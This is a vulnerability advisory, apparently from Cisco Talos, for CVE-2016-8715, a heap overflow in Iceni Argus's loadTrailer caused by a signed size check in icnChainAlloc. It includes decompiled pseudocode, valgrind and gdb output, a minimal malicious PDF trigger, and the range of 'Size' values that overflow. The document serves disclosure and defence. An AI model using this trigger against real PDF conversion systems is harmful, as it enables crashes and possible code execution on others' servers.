Iceni Argus icnChainAlloc Signed Comparison Code Execution Vulnerability(CVE-2016-8715)

### Summary An exploitable heap corruption vulnerability exists in the loadTrailer functionality of Iceni Argus version 6.6.05. A specially crafted PDF file can cause a heap corruption resulting in arbitrary code execution. An attacker can send/provide a malicious PDF file to trigger this vulnerability. ### Tested Versions Iceni Argus Version 6.6.05 (Sep 22 2016) NK Linux x64 ### Product URLs http://www.iceni.com/legacy.htm ### CVSSv3 Score 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ### Details ``` This vulnerability is present in the Iceni Argus PDF which is used inter alia to convert PDF files to (X)HTML form. ``` This product is mainly used by MarkLogic for PDF document conversions as part of their web based document search and rendering. A specially crafted PDF file can lead to an heap corruption and ultimately to remote code execution. ``` Let's investigate this vulnerability. After executing the PDF to HTML converter with a malformed pdf file as an input we can easily observe in the output of valgrind that an out of bounds write has occurred: Parsing macros... Macro synth-bookmarks='true' Macro image-output='true' Macro text-output='true' Macro zones='false' Macro ignore-text='true' Macro remove-overprint='false' Macro illustrations='true' Macro line-breaks='true' Macro image-quality='75' Macro page-start='' Macro page-end='' Macro document-start='' Macro document-end='' features='11140221' Processing... ==59595== Invalid write of size 4 ==59595== at 0x403087D: memset (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==59595== by 0x8161840: loadTrailer (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8161A01: ipDocXRefLoad (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8090D04: ipDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x806A3EB: icnDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80556A6: dumpFile (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80558E2: dumpCommandLine (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8051EF4: icnArgusExtract (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8050F75: main (in /home/icewall/bugs/cvtpdf/convert) ==59595== Address 0x49d0d40 is 49,176 bytes inside a block of size 49,179 alloc'd ==59595== at 0x402A17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==59595== by 0x81A880A: icnMalloc (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80677F8: _icnChainCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8090C16: ipDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x806A3EB: icnDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80556A6: dumpFile (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80558E2: dumpCommandLine (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8051EF4: icnArgusExtract (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8050F75: main (in /home/icewall/bugs/cvtpdf/convert) ==59595== ==59595== ==59595== Process terminating with default action of signal 11 (SIGSEGV) ==59595== Access not within mapped region at address 0x4AB3000 ==59595== at 0x403087D: memset (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==59595== by 0x8161840: loadTrailer (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8161A01: ipDocXRefLoad (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8090D04: ipDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x806A3EB: icnDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80556A6: dumpFile (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80558E2: dumpCommandLine (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8051EF4: icnArgusExtract (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8050F75: main (in /home/icewall/bugs/cvtpdf/convert) ``` we see that memset in `loadTrailer` function causes an overflow in tje buffer allocated in `ipDocCreate`. We will now analyze the `loadTrailer` function and try to figure out where the memset `size` parameter is coming from and in which conditions it will cause overflows. A pseudo code fragment of `loadTrailer` looks like this: ``` Line 1 int __usercall loadTrailer@<eax>(_DWORD *a1@<eax>, int *a2@<edx>, int a3@<ecx>) Line 2 { Line 3 Line 4 (...) Line 5 v17 = ipDictFindType(v16, "Root", 10); Line 6 v142 = 0; Line 7 if ( v17 ) Line 8 v142 = *(v17 + 1); Line 9 v18 = ipDictFindType(v138, "Size", 5); Line 10 if ( !v18 ) Line 11 { Line 12 if ( icnErrorGetCode(v20, v19) ) Line 13 goto LABEL_27; Line 14 v143 = 0; Line 15 v144 = 0; Line 16 v165 = 0; Line 17 goto LABEL_54; Line 18 } Line 19 v21 = *(v18 + 1); Line 20 (...) Line 21 v166 = 2 * v21; Line 22 if ( (2 * v21) < 500 ) Line 23 LABEL_54: Line 24 v166 = 500; Line 25 (...) Line 26 v81 = icnChainAlloc(v135->pdword234, 24 * v166); Line 27 if ( !v81 ) Line 28 goto LABEL_27; Line 29 memset(v81, 0, 24 * v166); Line 30 ``` In the above listing we see that the memset `size` parameter strongly depends on the `Size` field value at Line 9, which comes directly from a file. This value takes a part in couple arithmetic operations: at lines 21 and 29 and the result of that is used as a parameter to memset. At line 26 we see potential (re)allocation for the same value `24*v166` as used later for memset but that doesn't seem to happen and the code ends up overflowing a buffer allocated in `ipDocCreate`. Let's take a look at `icnChainAlloc`: ``` Line 1 char *__cdecl icnChainAlloc(void *bufferStruct, int allocSize) Line 2 { Line 3 signed int v8; // edi@9 Line 4 (...) Line 5 v8 = (allocSize + 3) & 0xFFFFFFFC; Line 6 while ( 1 ) Line 7 { Line 8 if ( v8 <= v7->chunkSize ) Line 9 goto LABEL_17; Line 10 if ( !v7->nextChunk ) Line 11 break; Line 12 v7 = v7->nextChunk; Line 13 } Line 14 v9 = (allocSize + 3) & 0xFFFFFFFC; Line 15 if ( v8 < v7->dwordC ) Line 16 v9 = v7->dwordC; Line 17 v10 = icnChainCreate(v9); Line 18 if ( v10 ) Line 19 { Line 20 v7->nextChunk = v10; Line 21 v7 = v10; Line 22 *bufferStruct = v10; Line 23 LABEL_17: Line 24 v11 = v7->pvoid4; Line 25 v7->chunkSize -= v8; Line 26 v7->pvoid4 = &v11[v8]; Line 27 *bufferStruct = v7; Line 28 return v11; Line 29 } Line 30 return 0; ``` At line 17, we see that a new allocation can occur for specified value `allocSize` but before this line is reached a couple of checks need to be passed. Inside the while loop starting at line 6 we see a check (line 8) where `allocSize` is compared with the available chunks size (the application uses a custom allocator for objects), but the comparison is made for a signed value (see the definition of the `v8` var at line 3). If the value of `allocSize` is bigger than INT_MAX (generally, a negative value), the check at line 8 will be true and the allocation for new space will not happen. The existing chunk of allocated memory will be returned and used later in the memset. An example of a PDF which leads to overflow situation looks like this : ``` %PDF-1 1 0 obj <</Kids[<</Parent 1 0 R>>]>> trailer <</Size -1/Root<</Pages 1 0 R>>>> ``` The value of the `Size` field is set to -1 what cause that we land in `icnChainAlloc` with the following parameters. ``` Breakpoint 1, 0x08160dc0 in loadTrailer () gdb-peda$ c Continuing. [----------------------------------registers-----------------------------------] EAX: 0x9964288 (0x09964288) EBX: 0x8fbc6e8 --> 0x8fbbe90 --> 0x1 ECX: 0xf7a09008 --> 0x0 EDX: 0x0 ESI: 0xf7a09244 --> 0x1 EDI: 0x9964368 --> 0x0 EBP: 0xf7a09008 --> 0x0 ESP: 0xfffc6bf0 --> 0x9964288 (0x09964288) EIP: 0x8161808 (call 0x80679f0 <icnChainAlloc>) EFLAGS: 0x283 (CARRY parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x81617fb: mov ecx,DWORD PTR [esp+0x38] 0x81617ff: mov eax,DWORD PTR [ecx+0x234] 0x8161805: mov DWORD PTR [esp],eax => 0x8161808: call 0x80679f0 <icnChainAlloc> 0x816180d: mov ecx,DWORD PTR [esp+0x28] 0x8161811: mov edx,DWORD PTR [esp+0x30] 0x8161815: mov DWORD PTR [edi+0x2c],eax 0x8161818: mov eax,DWORD PTR [esp+0x44] Guessed arguments: arg[0]: 0x9964288 (0x09964288) arg[1]: 0xffffffd0 [------------------------------------stack-------------------------------------] 0000| 0xfffc6bf0 --> 0x9964288 (0x09964288) 0004| 0xfffc6bf4 --> 0xffffffd0 0008| 0xfffc6bf8 --> 0x5 0012| 0xfffc6bfc --> 0x0 0016| 0xfffc6c00 --> 0xfffc6cb4 --> 0xf7d678a4 --> 0x56ed 0020| 0xfffc6c04 --> 0xfffc6c28 --> 0xf7a09008 --> 0x0 0024| 0xfffc6c08 --> 0xfffc6c20 --> 0x0 0028| 0xfffc6c0c --> 0x804baea ("strtod") [------------------------------------------------------------------------------] Legend: code, data, rodata, value ``` Of course `0xffffffd0` passes all mentioned constraints leading to situation where proper space is not allocated. Because the value passed to `icnChainAlloc` just needs to be a negative value and we have direct influence on the `Size` field, we can easily calculate entire range of values which will cause that situation. (0x80000000 / 2 ) / 24 = 0x2aaaaaa 0x2aaaaaa + 1 = 0x2aaaaab ( 44739243 ) So all values from 0x2aaaaab to 0xffffffff used as a value in Size field will lead to an overflow. ### Crash Information ``` Parsing macros... Macro synth-bookmarks='true' Macro image-output='true' Macro text-output='true' Macro zones='false' Macro ignore-text='true' Macro remove-overprint='false' Macro illustrations='true' Macro line-breaks='true' Macro image-quality='75' Macro page-start='' Macro page-end='' Macro document-start='' Macro document-end='' features='11140221' Processing... ==59595== Invalid write of size 4 ==59595== at 0x403087D: memset (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==59595== by 0x8161840: loadTrailer (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8161A01: ipDocXRefLoad (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8090D04: ipDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x806A3EB: icnDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80556A6: dumpFile (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80558E2: dumpCommandLine (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8051EF4: icnArgusExtract (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8050F75: main (in /home/icewall/bugs/cvtpdf/convert) ==59595== Address 0x49d0d40 is 49,176 bytes inside a block of size 49,179 alloc'd ==59595== at 0x402A17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==59595== by 0x81A880A: icnMalloc (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80677F8: _icnChainCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8090C16: ipDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x806A3EB: icnDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80556A6: dumpFile (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80558E2: dumpCommandLine (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8051EF4: icnArgusExtract (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8050F75: main (in /home/icewall/bugs/cvtpdf/convert) ==59595== ==59595== ==59595== Process terminating with default action of signal 11 (SIGSEGV) ==59595== Access not within mapped region at address 0x4AB3000 ==59595== at 0x403087D: memset (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==59595== by 0x8161840: loadTrailer (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8161A01: ipDocXRefLoad (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8090D04: ipDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x806A3EB: icnDocCreate (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80556A6: dumpFile (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x80558E2: dumpCommandLine (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8051EF4: icnArgusExtract (in /home/icewall/bugs/cvtpdf/convert) ==59595== by 0x8050F75: main (in /home/icewall/bugs/cvtpdf/convert) ``` ### Timeline * 2016-10-10 - Vendor Disclosure * 2017-02-27 - Public Release ### CREDIT * Discovered by Marcin 'Icewall' Noga of Cisco Talos.